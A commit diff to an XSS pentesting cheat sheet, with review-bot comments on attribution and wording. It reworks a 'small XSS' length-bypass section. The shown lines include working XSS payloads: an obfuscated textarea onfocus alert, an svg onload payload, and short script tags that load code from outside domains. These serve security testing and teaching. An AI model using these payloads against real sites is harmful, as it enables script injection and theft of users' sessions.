GitBook: [#3020] No subject

CPol 2022-02-18 15:49:34 +00:00 committed by gitbook-bot
parent 15ca21d79a
commit 5b391bbae7
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
1 changed files with 7 additions and 5 deletions

@ -170,11 +170,14 @@ onerror=alert`1`
<<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS=alert`1` //
```
### Length bypass (XSS in 20chars)
### Length bypass (small XSSs)
Taken from the blog of [Jorge Lajara](https://jlajara.gitlab.io/posts/2019/11/30/XSS\_20\_characters.html).
{% hint style="info" %}
**More tiny XSS for different environments** payload [**can be found here**](https://github.com/terjanq/Tiny-XSS-Payloads) and [**here**](https://tinyxss.terjanq.me).
{% endhint %}
```javascript
```html
<!-- Taken from the blog of Jorge Lajara -->
<svg/onload=alert``>
<script src=//aa.es>
<script src=//℡㏛.pw>
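Review bot: the attribution loses its source link in this hunk. The linked sentence "Taken from the blog of [Jorge Lajara]" above the fence becomes `<!-- Taken from the blog of Jorge Lajara -->` inside the code block, so the reader no longer gets the URL of the original post. Either keep the linked sentence above the fence or put the URL in the comment. In the new hint block, "payload" sits outside the bold span and reads oddly; "**More tiny XSS payloads for different environments** can be found here and here" would be cleaner. Since the heading no longer says "20chars", one sentence stating the length constraint these entries are meant for would keep the section self-explanatory.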
@ -182,8 +185,7 @@ Taken from the blog of [Jorge Lajara](https://jlajara.gitlab.io/posts/2019/11/30
The last one is using 2 unicode characters which expands to 5: telsr\
More of these characters can be found [here](https://www.unicode.org/charts/normalization/).\
To check in which characters are decomposed check [here](https://www.compart.com/en/unicode/U+2121).\
**More tiny XSS for different environments** payload [**can be found here**](https://github.com/terjanq/Tiny-XSS-Payloads) and [**here**](https://tinyxss.terjanq.me).
To check in which characters are decomposed check [here](https://www.compart.com/en/unicode/U+2121).
### Click XSS - Clickjacking
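Review bot: the rewritten last line of this paragraph only drops the trailing backslash, so "To check in which characters are decomposed check [here]" keeps its awkward wording. Since the line is touched anyway, consider "To see which characters a symbol decomposes into, check [here]". The unchanged context line "expands to 5: telsr" would also read better if it showed the two expansions separately instead of running them together.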